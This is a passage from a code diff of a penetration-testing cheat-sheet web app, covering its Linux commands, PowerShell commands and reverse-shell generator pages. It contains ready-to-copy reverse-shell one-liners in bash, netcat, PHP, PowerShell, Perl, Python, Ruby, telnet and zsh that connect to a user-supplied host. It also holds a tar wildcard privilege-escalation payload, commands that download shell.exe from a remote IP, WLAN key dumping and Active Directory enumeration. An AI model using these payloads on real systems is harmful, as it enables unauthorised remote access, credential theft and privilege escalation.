</div>
<Divider orientation='center'>How to port forward ?</Divider>
<div
key='h'
style={{
padding: 15
}}
>
{PortForwarding.map((k, i) => {
return (
<Paragraph key={i} code editable copyable ellipsis={true}>
{k.title}
</Paragraph>
);
})}
</div>
<Divider orientation='center'>TAR wildcard cronjob privilege escalation</Divider>
<div
key='h'
style={{
padding: 15
}}
>
{wildcardPrivesc.map((k, i) => {
return (
<Paragraph key={i} code editable copyable ellipsis={true}>
{k.title}
</Paragraph>
);
})}
</div>
</QueueAnim>
);
},
{
title: `touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"`
},
{
title: ` touch "/var/www/html/--checkpoint=1"`
}
];
return (
<QueueAnim delay={300} duration={1500}>
<Title level={2} style={{ fontWeight: 'bold', margin: 15 }}>
Useful Linux command for your Penetration Testing
</Title>
<Paragraph style={{ margin: 15 }}>List of useful commands on Linux</Paragraph>
<Divider orientation='center'>SUID Commands</Divider>
<div
key='a'
style={{
padding: 15
}}
>
{Suid.map( ( k, i ) => {
return (
<Paragraph key={i} code editable copyable ellipsis={true}>
{k.title}
</Paragraph>
);
} )}
</div>
<Divider orientation='center'>What version of the system ?</Divider>
<div
key='b'
style={{
padding: 15
}}
>
{VersionSystem.map( ( k, i ) => {
return (
<Paragraph key={i} code editable copyable ellipsis={true}>
{k.title}
</Paragraph>
);
} )}
</div>
<Divider orientation='center'>What is its kernel version ?</Divider>
<div
key='c'
style={{
padding: 15
}}
>
{KernelVersion.map( ( k, i ) => {
return (
<Paragraph key={i} code editable copyable ellipsis={true}>
{k.title}
</Paragraph>
);
} )}
</div>
<Divider orientation='center'>What is the environment variables ?</Divider>
<div
key='d'
style={{
padding: 15
}}
>
{EnvironmentVariables.map( ( k, i ) => {
return (
<Paragraph key={i} code editable copyable ellipsis={true}>
{k.title}
</Paragraph>
);
} )}
</div>
<Divider orientation='center'>Service settings, there is any wrong allocation?</Divider>
<div
key='e'
style={{
padding: 15
}}
>
{ServiceSettings.map( ( k, i ) => {
return (
<Paragraph key={i} code editable copyable ellipsis={true}>
{k.title}
</Paragraph>
);
} )}
</div>
<Divider orientation='center'>Is there any cron jobs ?</Divider>
<div
key='f'
style={{
padding: 15
}}
>
{CronJobs.map( ( k, i ) => {
return (
<Paragraph key={i} code editable copyable ellipsis={true}>
{k.title}
</Paragraph>
);
} )}
</div>
<Divider orientation='center'>Other users host communication with the system ?</Divider>
<div
key='g'
style={{
padding: 15
}}
>
{UsersHost.map( ( k, i ) => {
return (
<Paragraph key={i} code editable copyable ellipsis={true}>
{k.title}
</Paragraph>
);
} )}
</div>
<Divider orientation='center'>How to port forward ?</Divider>
<div
key='h'
style={{
padding: 15
}}
>
{PortForwarding.map( ( k, i ) => {
return (
<Paragraph key={i} code editable copyable ellipsis={true}>
{k.title}
</Paragraph>
);
} )}
</div>
<Divider orientation='center'>TAR wildcard cronjob privilege escalation</Divider>
<div
key='h'
style={{
padding: 15
}}
>
{wildcardPrivesc.map( ( k, i ) => {
return (
<Paragraph key={i} code editable copyable ellipsis={true}>
{k.title}
</Paragraph>
);
} )}
</div>
</QueueAnim>
);
}

410
src/components/linux/PowershellCommands.tsx
View File

@@ -4,236 +4,236 @@ import QueueAnim from 'rc-queue-anim';
const { Title, Paragraph, Text } = Typography;
export default function PowershellCommands() {
const local_sys_enum = [
{ title: 'systeminfo' },
{ title: 'Get-WmiObject Win32_ComputerSystem' },
{ title: 'echo "$env:COMPUTERNAME.$env:USERDNSDOMAIN"' }
];
const lastpatchlist = 'Get-Hotfix -description "Security update"';
const lastpatchlist_wmic = 'wmic qfe get HotfixID,ServicePackInEffect,InstallDate,InstalledBy,InstalledOn';
const envVar = 'Get-ChildItem Env: | ft Key,Value';
const envVar_cmd = 'set';
const wlan_creddump = [
{ title: 'netsh wlan show profiles' },
{ title: 'netsh wlan show profile name="PROFILE-NAME" key=clear' }
];
export default function PowershellCommands () {
const local_sys_enum = [
{ title: 'systeminfo' },
{ title: 'Get-WmiObject Win32_ComputerSystem' },
{ title: 'echo "$env:COMPUTERNAME.$env:USERDNSDOMAIN"' }
];
const lastpatchlist = 'Get-Hotfix -description "Security update"';
const lastpatchlist_wmic = 'wmic qfe get HotfixID,ServicePackInEffect,InstallDate,InstalledBy,InstalledOn';
const envVar = 'Get-ChildItem Env: | ft Key,Value';
const envVar_cmd = 'set';
const wlan_creddump = [
{ title: 'netsh wlan show profiles' },
{ title: 'netsh wlan show profile name="PROFILE-NAME" key=clear' }
];
// windows wget like
const powershell_http_dl = 'Invoke-WebRequest "http://10.10.10.10/shell.exe" -OutFile "shell.exe" ';
const cmd_cert_http_dl = 'certutil -urlcache -f http://10.10.10.10/shell.exe shell.exe';
// windows wget like
const powershell_http_dl = 'Invoke-WebRequest "http://10.10.10.10/shell.exe" -OutFile "shell.exe" ';
const cmd_cert_http_dl = 'certutil -urlcache -f http://10.10.10.10/shell.exe shell.exe';
// require powerview
const power_view_repo: string =
'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1';
// require powerview
const power_view_repo: string =
'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1';
// domain enum
const domain_name = `Get-NetDomain`;
const forest_domain_list = `Get-NetForestDomain`;
const domain_SID = `Get-DomainSID `;
const domain_Policy = `Get-DomainPolicy`;
const domain_OUs = `Get-NetOU`;
const domain_trust = `Get-NetDomainTrust`;
// gpo
const gpo_enum = `Get-NetGPO -ComputerName computername.domain.com`;
// passwd enum
const passwd_lastset = `Get-UserProperty Properties pwdlastset`;
const user_desc_harvest = `Find-UserField -SearchField Description SearchTerm “pass”`;
// domain enum
const domain_name = `Get-NetDomain`;
const forest_domain_list = `Get-NetForestDomain`;
const domain_SID = `Get-DomainSID `;
const domain_Policy = `Get-DomainPolicy`;
const domain_OUs = `Get-NetOU`;
const domain_trust = `Get-NetDomainTrust`;
// gpo
const gpo_enum = `Get-NetGPO -ComputerName computername.domain.com`;
// passwd enum
const passwd_lastset = `Get-UserProperty Properties pwdlastset`;
const user_desc_harvest = `Find-UserField -SearchField Description SearchTerm “pass”`;
//computers domain
const domain_computers = `Get-NetComputer`;
const domain_pingable_computers = `Get-NetComputer -Ping`;
const domain_win7U_computers = `Get-NetComputer OperatingSystem "Windows 7 Ultimate"`;
//computers domain
const domain_computers = `Get-NetComputer`;
const domain_pingable_computers = `Get-NetComputer -Ping`;
const domain_win7U_computers = `Get-NetComputer OperatingSystem "Windows 7 Ultimate"`;
//domain admins
const domain_admin_members = `Get-NetGroupMember -GroupName "Domain Admins"`;
const domain_admins_groups = `Get-NetGroup *admin*`;
const local_admins = `Get-NetLocalGroup ComputerName PCNAME-001`;
const user_group_membership = `Get-NetGroup UserName "username"`;
//domain admins
const domain_admin_members = `Get-NetGroupMember -GroupName "Domain Admins"`;
const domain_admins_groups = `Get-NetGroup *admin*`;
const local_admins = `Get-NetLocalGroup ComputerName PCNAME-001`;
const user_group_membership = `Get-NetGroup UserName "username"`;
//acl
const ACL_user_enum = `Get-ObjectAcl -SamAccountName "users" -ResolveGUIDs`;
const ACL_gpoedit_rights = `Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name}`;
const ACL_passwd_edit_rights = `Get-ObjectAcl -SamAccountName labuser -ResolveGUIDs -RightsFilter "ResetPassword"`;
//acl
const ACL_user_enum = `Get-ObjectAcl -SamAccountName "users" -ResolveGUIDs`;
const ACL_gpoedit_rights = `Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name}`;
const ACL_passwd_edit_rights = `Get-ObjectAcl -SamAccountName labuser -ResolveGUIDs -RightsFilter "ResetPassword"`;
return (
<QueueAnim delay={300} duration={1500}>
<Title level={2} style={{ fontWeight: 'bold', margin: 15 }}>
Powershell handy commands
</Title>
<Paragraph style={{ margin: 15 }}>List of useful Powershell commands</Paragraph>
<Divider dashed />
<div
key='a'
style={{
padding: 15
}}
>
<Title level={3}>System enumeration</Title>
{local_sys_enum.map((k, i) => {
return (
<Paragraph key={i} copyable code editable ellipsis={true}>
{k.title}
</Paragraph>
);
})}
<Text strong># List Security patches</Text>
<Paragraph copyable code editable ellipsis={true}>
{lastpatchlist}
</Paragraph>
<Paragraph copyable code editable ellipsis={true}>
{lastpatchlist_wmic}
</Paragraph>
<Text strong># Environment Variables</Text>
<Paragraph copyable code editable ellipsis={true}>
{envVar}
</Paragraph>
<Text strong> (over cmd.exe) </Text>
<Paragraph copyable code editable ellipsis={true}>
{envVar_cmd}
</Paragraph>
<Divider dashed />
<Title level={4}>HTTP download (wget like)</Title>
<Paragraph copyable code editable ellipsis={true}>
{powershell_http_dl}
</Paragraph>
<Text strong># Cmd compatible</Text>
<Paragraph copyable code editable ellipsis={true}>
{cmd_cert_http_dl}
</Paragraph>
<Divider dashed />
<Title level={4}>WLAN enumeration</Title>
{wlan_creddump.map((k, i) => {
return (
<Paragraph key={i} copyable code editable ellipsis={true}>
{k.title}
</Paragraph>
);
})}
</div>
// dump user accounts
const local_recon_ldifde = `ldifde -d "OU=THING,DC=CHANGE,DC=ME" -p subtree -f dump.ldf`
const local_recon_csvde = `csvde -d "OU=THING,DC=CHANGE,DC=ME" -p subtree -f dump.csv`
<Divider dashed />
<div
key='b'
style={{
padding: 15
}}
>
<Title level={2}>Active Directory enumeration</Title>
<Paragraph>Require Powerview.ps1</Paragraph>
<Paragraph copyable code editable ellipsis={true}>
{power_view_repo}
</Paragraph>
<Title level={4}>Domain enumeration</Title>
return (
<QueueAnim delay={300} duration={1500}>
<Title level={2} style={{ fontWeight: 'bold', margin: 15 }}>
Powershell handy commands
</Title>
<Paragraph style={{ margin: 15 }}>List of useful Powershell commands</Paragraph>
<Divider orientation='center'></Divider>
<div
key='a'
style={{
padding: 15
}}
>
<Title level={3}>System enumeration</Title>
{local_sys_enum.map( ( k, i ) => {
return (
<Paragraph key={i} copyable code editable ellipsis={true}>
{k.title}
</Paragraph>
);
} )}
<Text strong># List Security patches</Text>
<Paragraph copyable code editable ellipsis={true}>
{lastpatchlist}
</Paragraph>
<Paragraph copyable code editable ellipsis={true}>
{lastpatchlist_wmic}
</Paragraph>
<Text strong># Environment Variables</Text>
<Paragraph copyable code editable ellipsis={true}>
{envVar}
</Paragraph>
<Text strong> (over cmd.exe) </Text>
<Paragraph copyable code editable ellipsis={true}>
{envVar_cmd}
</Paragraph>
<Divider orientation='center'>HTTP download (wget like)</Divider>
<Paragraph copyable code editable ellipsis={true}>
{powershell_http_dl}
</Paragraph>
<Text strong># Cmd compatible</Text>
<Paragraph copyable code editable ellipsis={true}>
{cmd_cert_http_dl}
</Paragraph>
<Divider orientation='center'>WLAN enumeration</Divider>
{wlan_creddump.map( ( k, i ) => {
return (
<Paragraph key={i} copyable code editable ellipsis={true}>
{k.title}
</Paragraph>
);
} )}
</div>
<Paragraph copyable code editable ellipsis={true}>
{domain_name}
</Paragraph>
<Divider orientation='center'>Active Directory enumeration</Divider>
<div
key='b'
style={{
padding: 15
}}
>
<Paragraph>Require Powerview.ps1</Paragraph>
<Paragraph copyable code editable ellipsis={true}>
{power_view_repo}
</Paragraph>
<Text strong># Domain enumeration</Text>
<Paragraph copyable code editable ellipsis={true}>
{domain_name}
</Paragraph>
<Text strong># List Forest Domains </Text>
<Paragraph copyable code editable ellipsis={true}>
{forest_domain_list}
</Paragraph>
<Text strong># List Forest Domains </Text>
<Paragraph copyable code editable ellipsis={true}>
{forest_domain_list}
</Paragraph>
<Text strong># Domain SID </Text>
<Paragraph copyable code editable ellipsis={true}>
{domain_SID}
</Paragraph>
<Text strong># Domain SID </Text>
<Paragraph copyable code editable ellipsis={true}>
{domain_SID}
</Paragraph>
<Text strong># Domain Policy </Text>
<Paragraph copyable code editable ellipsis={true}>
{domain_Policy}
</Paragraph>
<Text strong># Domain Policy </Text>
<Paragraph copyable code editable ellipsis={true}>
{domain_Policy}
</Paragraph>
<Text strong># Domain Organizational Units </Text>
<Paragraph copyable code editable ellipsis={true}>
{domain_OUs}
</Paragraph>
<Text strong># Domain Organizational Units </Text>
<Paragraph copyable code editable ellipsis={true}>
{domain_OUs}
</Paragraph>
<Text strong># List trusted Domains</Text>
<Paragraph copyable code editable ellipsis={true}>
{domain_trust}
</Paragraph>
<Text strong># List trusted Domains</Text>
<Paragraph copyable code editable ellipsis={true}>
{domain_trust}
</Paragraph>
<Divider dashed />
<Divider orientation='center'>GPO enumeration</Divider>
<Title level={4}> GPO enumeration</Title>
<Text strong># GPO applied to the machine</Text>
<Paragraph copyable code editable ellipsis={true}>
{gpo_enum}
</Paragraph>
<Text strong># GPO applied to the machine</Text>
<Paragraph copyable code editable ellipsis={true}>
{gpo_enum}
</Paragraph>
<Divider orientation='center'>Password enumeration</Divider>
<Divider dashed />
<Text strong># Last Password Set date</Text>
<Paragraph copyable code editable ellipsis={true}>
{passwd_lastset}
</Paragraph>
<Text strong># Description of User object </Text>
<Paragraph copyable code editable ellipsis={true}>
{user_desc_harvest}
</Paragraph>
<Divider orientation='center'>Computer enumeration</Divider>
<Title level={4}> Password enumeration</Title>
<Text strong># List Computers of the Domain</Text>
<Paragraph copyable code editable ellipsis={true}>
{domain_computers}
</Paragraph>
<Text strong># List Pingable Hosts </Text>
<Paragraph copyable code editable ellipsis={true}>
{domain_pingable_computers}
</Paragraph>
<Text strong># List Windows 7 Ultimate Computers </Text>
<Paragraph copyable code editable ellipsis={true}>
{domain_win7U_computers}
</Paragraph>
<Text strong># Last Password Set date</Text>
<Paragraph copyable code editable ellipsis={true}>
{passwd_lastset}
</Paragraph>
<Text strong># Description of User object </Text>
<Paragraph copyable code editable ellipsis={true}>
{user_desc_harvest}
</Paragraph>
<Divider dashed />
<Divider orientation='center'>Admin groups and account enumeration</Divider>
<Title level={4}> Computer enumeration</Title>
<Text strong># List Domain Admin members</Text>
<Paragraph copyable code editable ellipsis={true}>
{domain_admin_members}
</Paragraph>
<Text strong># List Admin Groups </Text>
<Paragraph copyable code editable ellipsis={true}>
{domain_admins_groups}
</Paragraph>
<Text strong># List Local Admins [need Administrative rights] </Text>
<Paragraph copyable code editable ellipsis={true}>
{local_admins}
</Paragraph>
<Text strong># List Computers of the Domain</Text>
<Paragraph copyable code editable ellipsis={true}>
{domain_computers}
</Paragraph>
<Text strong># List Pingable Hosts </Text>
<Paragraph copyable code editable ellipsis={true}>
{domain_pingable_computers}
</Paragraph>
<Text strong># List Windows 7 Ultimate Computers </Text>
<Paragraph copyable code editable ellipsis={true}>
{domain_win7U_computers}
</Paragraph>
<Text strong># Get groups of user [need Administrative rights] </Text>
<Paragraph copyable code editable ellipsis={true}>
{user_group_membership}
</Paragraph>
<Divider dashed />
<Divider orientation='center'>ACL enumeration</Divider>
<Title level={4}> Admin groups and account enumeration</Title>
<Text strong># User ACL </Text>
<Paragraph copyable code editable ellipsis={true}>
{ACL_user_enum}
</Paragraph>
<Text strong># List Domain Admin members</Text>
<Paragraph copyable code editable ellipsis={true}>
{domain_admin_members}
</Paragraph>
<Text strong># List Admin Groups </Text>
<Paragraph copyable code editable ellipsis={true}>
{domain_admins_groups}
</Paragraph>
<Text strong># List Local Admins [need Administrative rights] </Text>
<Paragraph copyable code editable ellipsis={true}>
{local_admins}
</Paragraph>
<Text strong># GPO modifications rights</Text>
<Paragraph copyable code editable ellipsis={true}>
{ACL_gpoedit_rights}
</Paragraph>
<Text strong># Get groups of user [need Administrative rights] </Text>
<Paragraph copyable code editable ellipsis={true}>
{user_group_membership}
</Paragraph>
<Text strong># Password reset rights</Text>
<Paragraph copyable code editable ellipsis={true}>
{ACL_passwd_edit_rights}
</Paragraph>
<Divider dashed />
<Title level={4}> ACL enumeration</Title>
<Text strong># User ACL </Text>
<Paragraph copyable code editable ellipsis={true}>
{ACL_user_enum}
</Paragraph>
<Text strong># GPO modifications rights</Text>
<Paragraph copyable code editable ellipsis={true}>
{ACL_gpoedit_rights}
</Paragraph>
<Text strong># Password reset rights</Text>
<Paragraph copyable code editable ellipsis={true}>
{ACL_passwd_edit_rights}
</Paragraph>
</div>
</QueueAnim>
);
<Divider orientation='center'>Local reconnaissance</Divider>
<Text strong># Export user accounts with ldifde</Text>
<Paragraph copyable code editable ellipsis={true}>
{local_recon_ldifde}
</Paragraph>
<Text strong># Export user accounts with csvde</Text>
<Paragraph copyable code editable ellipsis={true}>
{local_recon_csvde}
</Paragraph>
</div>
</QueueAnim>
);
}

641
src/components/linux/ReverseShell.tsx
View File

@@ -6,341 +6,314 @@ import QueueAnim from 'rc-queue-anim';
import Clipboard from 'react-clipboard.js';
const { Title, Paragraph } = Typography;
const IconFont = createFromIconfontCN({
scriptUrl: [ './iconfont.js' ]
});
const IconFont = createFromIconfontCN( {
scriptUrl: [ './iconfont.js' ]
} );
export default function ReverseShell() {
const useIPv4State = PersistedState('ipv4_tcp_cache');
const [ values, setValues ] = useIPv4State({
ip: '',
port: ''
});
const handleChange = (name: string) => (event: { target: { value: string } }) => {
setValues({ ...values, [name]: event.target.value });
};
const successInfoReverseShell = () => {
message.success('Your reverse shell has been copied');
};
const successInfoEncodeURL = () => {
message.success('Reverse shell URI encoded has been copied');
};
const bash_rshell = `bash -c 'exec bash -i &>/dev/tcp/${values.ip}/${values.port} <&1'`;
const netcat_rshell = `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ${values.ip} ${values.port} >/tmp/f`;
const php_rshell = `php -r '$sock=fsockopen(getenv("${values.ip}"),getenv("${values.port}"));exec("/bin/sh -i <&3 >&3 2>&3");'`;
const PS_rshell = `powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('${values.ip}',${values.port});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"`;
const perl_rshell = `perl -e 'use Socket;$i="$ENV{${values.ip}}";$p=$ENV{${values.port}};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'`;
const python_rshell = `python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("${values.ip}",${values.port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'`;
const ruby_rshell = `ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["${values.ip}"],ENV["${values.port}"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'`;
const telnet_rshell = `TF=$(mktemp -u); mkfifo $TF && telnet ${values.ip} ${values.port} 0<$TF | /bin sh 1>$TF`;
const zsh_rshell = `zsh -c 'zmodload zsh/net/tcp && ztcp ${values.ip} ${values.port} && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'`;
export default function ReverseShell () {
const useIPv4State = PersistedState( 'ipv4_tcp_cache' );
const [ values, setValues ] = useIPv4State( {
ip: '',
port: ''
} );
const handleChange = ( name: string ) => ( event: { target: { value: string } } ) => {
setValues( { ...values, [ name ]: event.target.value } );
};
const successInfoReverseShell = () => {
message.success( 'Your reverse shell has been copied' );
};
const successInfoEncodeURL = () => {
message.success( 'Reverse shell URI encoded has been copied' );
};
const bash_rshell = `bash -c 'exec bash -i &>/dev/tcp/${ values.ip }/${ values.port } <&1'`;
const netcat_rshell = `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ${ values.ip } ${ values.port } >/tmp/f`;
const php_rshell = `php -r '$sock=fsockopen(getenv("${ values.ip }"),getenv("${ values.port }"));exec("/bin/sh -i <&3 >&3 2>&3");'`;
const PS_rshell = `powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('${ values.ip }',${ values.port });$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"`;
const perl_rshell = `perl -e 'use Socket;$i="$ENV{${ values.ip }}";$p=$ENV{${ values.port }};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'`;
const python_rshell = `python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("${ values.ip }",${ values.port }));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'`;
const ruby_rshell = `ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["${ values.ip }"],ENV["${ values.port }"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'`;
const telnet_rshell = `TF=$(mktemp -u); mkfifo $TF && telnet ${ values.ip } ${ values.port } 0<$TF | /bin sh 1>$TF`;
const zsh_rshell = `zsh -c 'zmodload zsh/net/tcp && ztcp ${ values.ip } ${ values.port } && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'`;
return (
<QueueAnim delay={300} duration={1500}>
<Title level={2} style={{ fontWeight: 'bold', margin: 15 }}>
Reverse shell
</Title>
<Paragraph style={{ margin: 15 }}>
A reverse shell is a shell session established on a connection that is initiated from a remote machine,
not from the local host.
</Paragraph>
<div style={{ padding: 15 }}>
<Row gutter={{ xs: 8, sm: 16, md: 24, lg: 32 }}>
<Col span={12}>
<Input
maxLength={15}
prefix={<WifiOutlined />}
name='Ip adress'
placeholder='IP Address or domain (ex: 212.212.111.222)'
onChange={handleChange('ip')}
value={values.ip}
/>
</Col>
<Col span={12}>
<Input
maxLength={5}
prefix={<IconFont type='icon-Network-Plug' />}
name='Port'
placeholder='Port (ex: 1337)'
onChange={handleChange('port')}
value={values.port}
/>
</Col>
</Row>
</div>
<Divider dashed />
<div style={{ padding: 10, marginTop: 15 }} key='a'>
<Title level={3}>
Bash <IconFont type='icon-gnubash' />
</Title>
<Paragraph code ellipsis={true}>
{bash_rshell}
</Paragraph>
<Clipboard component='a' data-clipboard-text={bash_rshell}>
<Button
type='primary'
onClick={successInfoReverseShell}
style={{ marginBottom: 10, marginTop: 15 }}
>
<CopyOutlined /> Copy the reverse shell
</Button>
</Clipboard>
<Clipboard component='a' data-clipboard-text={encodeURI(bash_rshell)}>
<Button
type='dashed'
onClick={successInfoEncodeURL}
style={{ marginBottom: 10, marginTop: 15, marginLeft: 15 }}
>
<LinkOutlined /> URL encoded
</Button>
</Clipboard>
</div>
<Divider dashed />
<div style={{ padding: 10, marginTop: 15 }} key='a'>
<Title level={3}>
Zsh <IconFont type='icon-command-line' />
</Title>
<Paragraph code ellipsis={true}>
{zsh_rshell}
</Paragraph>
<Clipboard component='a' data-clipboard-text={zsh_rshell}>
<Button
type='primary'
onClick={successInfoReverseShell}
style={{ marginBottom: 10, marginTop: 15 }}
>
<CopyOutlined /> Copy the reverse shell
</Button>
</Clipboard>
<Clipboard component='a' data-clipboard-text={encodeURI(zsh_rshell)}>
<Button
type='dashed'
onClick={successInfoEncodeURL}
style={{ marginBottom: 10, marginTop: 15, marginLeft: 15 }}
>
<LinkOutlined /> URL encoded
</Button>
</Clipboard>
</div>
<Divider dashed />
<div style={{ padding: 10, marginTop: 15 }} key='b'>
<Title level={3}>
Netcat <IconFont type='icon-command-line' />
</Title>
<Paragraph code ellipsis={true}>
{netcat_rshell}
</Paragraph>
<Clipboard component='a' data-clipboard-text={netcat_rshell}>
<Button
type='primary'
onClick={successInfoReverseShell}
style={{ marginBottom: 10, marginTop: 15 }}
>
<CopyOutlined /> Copy the reverse shell
</Button>
</Clipboard>
<Clipboard component='a' data-clipboard-text={encodeURI(netcat_rshell)}>
<Button
type='dashed'
onClick={successInfoEncodeURL}
style={{ marginBottom: 10, marginTop: 15, marginLeft: 15 }}
>
<LinkOutlined /> URL encoded
</Button>
</Clipboard>
</div>
<Divider dashed />
<div
key='c'
style={{
padding: 15,
marginTop: 15
}}
>
<Title level={3}>
PHP <IconFont type='icon-php' />
</Title>
<Paragraph code ellipsis={true}>
{php_rshell}
</Paragraph>
<Clipboard component='a' data-clipboard-text={php_rshell}>
<Button
type='primary'
onClick={successInfoReverseShell}
style={{ marginBottom: 10, marginTop: 15 }}
>
<CopyOutlined />
Copy the reverse shell
</Button>
</Clipboard>
<Clipboard component='a' data-clipboard-text={encodeURI(php_rshell)}>
<Button
type='dashed'
onClick={successInfoEncodeURL}
style={{ marginBottom: 10, marginTop: 15, marginLeft: 15 }}
>
<LinkOutlined /> URL encoded
</Button>
</Clipboard>
</div>
return (
<QueueAnim delay={300} duration={1500}>
<Title level={2} style={{ fontWeight: 'bold', margin: 15 }}>
Reverse shell
</Title>
<Paragraph style={{ margin: 15 }}>
A reverse shell is a shell session established on a connection that is initiated from a remote machine,
not from the local host.
</Paragraph>
<div style={{ padding: 15 }}>
<Row gutter={{ xs: 8, sm: 16, md: 24, lg: 32 }}>
<Col span={12}>
<Input
maxLength={15}
prefix={<WifiOutlined />}
name='Ip adress'
placeholder='IP Address or domain (ex: 212.212.111.222)'
onChange={handleChange( 'ip' )}
value={values.ip}
/>
</Col>
<Col span={12}>
<Input
maxLength={5}
prefix={<IconFont type='icon-Network-Plug' />}
name='Port'
placeholder='Port (ex: 1337)'
onChange={handleChange( 'port' )}
value={values.port}
/>
</Col>
</Row>
</div>
<Divider orientation='center'>Bash</Divider>
<div style={{ padding: 10, marginTop: 15 }} key='a'>
<Paragraph code ellipsis={true}>
{bash_rshell}
</Paragraph>
<Clipboard component='a' data-clipboard-text={bash_rshell}>
<Button
type='primary'
onClick={successInfoReverseShell}
style={{ marginBottom: 10, marginTop: 15 }}
>
<CopyOutlined /> Copy the reverse shell
</Button>
</Clipboard>
<Clipboard component='a' data-clipboard-text={encodeURI( bash_rshell )}>
<Button
type='dashed'
onClick={successInfoEncodeURL}
style={{ marginBottom: 10, marginTop: 15, marginLeft: 15 }}
>
<LinkOutlined /> URL encoded
</Button>
</Clipboard>
</div>
<Divider orientation='center'>Zsh</Divider>
<div style={{ padding: 10, marginTop: 15 }} key='a'>
<Paragraph code ellipsis={true}>
{zsh_rshell}
</Paragraph>
<Clipboard component='a' data-clipboard-text={zsh_rshell}>
<Button
type='primary'
onClick={successInfoReverseShell}
style={{ marginBottom: 10, marginTop: 15 }}
>
<CopyOutlined /> Copy the reverse shell
</Button>
</Clipboard>
<Clipboard component='a' data-clipboard-text={encodeURI( zsh_rshell )}>
<Button
type='dashed'
onClick={successInfoEncodeURL}
style={{ marginBottom: 10, marginTop: 15, marginLeft: 15 }}
>
<LinkOutlined /> URL encoded
</Button>
</Clipboard>
</div>
<Divider orientation='center'>Netcat</Divider>
<div style={{ padding: 10, marginTop: 15 }} key='b'>
<Paragraph code ellipsis={true}>
{netcat_rshell}
</Paragraph>
<Clipboard component='a' data-clipboard-text={netcat_rshell}>
<Button
type='primary'
onClick={successInfoReverseShell}
style={{ marginBottom: 10, marginTop: 15 }}
>
<CopyOutlined /> Copy the reverse shell
</Button>
</Clipboard>
<Clipboard component='a' data-clipboard-text={encodeURI( netcat_rshell )}>
<Button
type='dashed'
onClick={successInfoEncodeURL}
style={{ marginBottom: 10, marginTop: 15, marginLeft: 15 }}
>
<LinkOutlined /> URL encoded
</Button>
</Clipboard>
</div>
<Divider orientation='center'>PHP</Divider>
<div
key='c'
style={{
padding: 15,
marginTop: 15
}}
>
<Paragraph code ellipsis={true}>
{php_rshell}
</Paragraph>
<Clipboard component='a' data-clipboard-text={php_rshell}>
<Button
type='primary'
onClick={successInfoReverseShell}
style={{ marginBottom: 10, marginTop: 15 }}
>
<CopyOutlined />
Copy the reverse shell
</Button>
</Clipboard>
<Clipboard component='a' data-clipboard-text={encodeURI( php_rshell )}>
<Button
type='dashed'
onClick={successInfoEncodeURL}
style={{ marginBottom: 10, marginTop: 15, marginLeft: 15 }}
>
<LinkOutlined /> URL encoded
</Button>
</Clipboard>
</div>
<Divider dashed />
<div style={{ padding: 10, marginTop: 15 }} key='a'>
<Title level={3}>
PowerShell <IconFont type='icon-powershell' />
</Title>
<Paragraph code ellipsis={true}>
{PS_rshell}
</Paragraph>
<Clipboard component='a' data-clipboard-text={PS_rshell}>
<Button
type='primary'
onClick={successInfoReverseShell}
style={{ marginBottom: 10, marginTop: 15 }}
>
<CopyOutlined /> Copy the reverse shell
</Button>
</Clipboard>
<Clipboard component='a' data-clipboard-text={encodeURI(PS_rshell)}>
<Button
type='dashed'
onClick={successInfoEncodeURL}
style={{ marginBottom: 10, marginTop: 15, marginLeft: 15 }}
>
<LinkOutlined /> URL encoded
</Button>
</Clipboard>
</div>
<div
key='d'
style={{
padding: 15,
marginTop: 15
}}
>
<Divider dashed />
<Title level={3}>
Perl <IconFont type='icon-perl' />
</Title>
<Paragraph code ellipsis={true}>
{perl_rshell}
</Paragraph>
<Clipboard component='a' data-clipboard-text={perl_rshell}>
<Button
type='primary'
onClick={successInfoReverseShell}
style={{ marginBottom: 10, marginTop: 15 }}
>
<CopyOutlined />
Copy the reverse shell
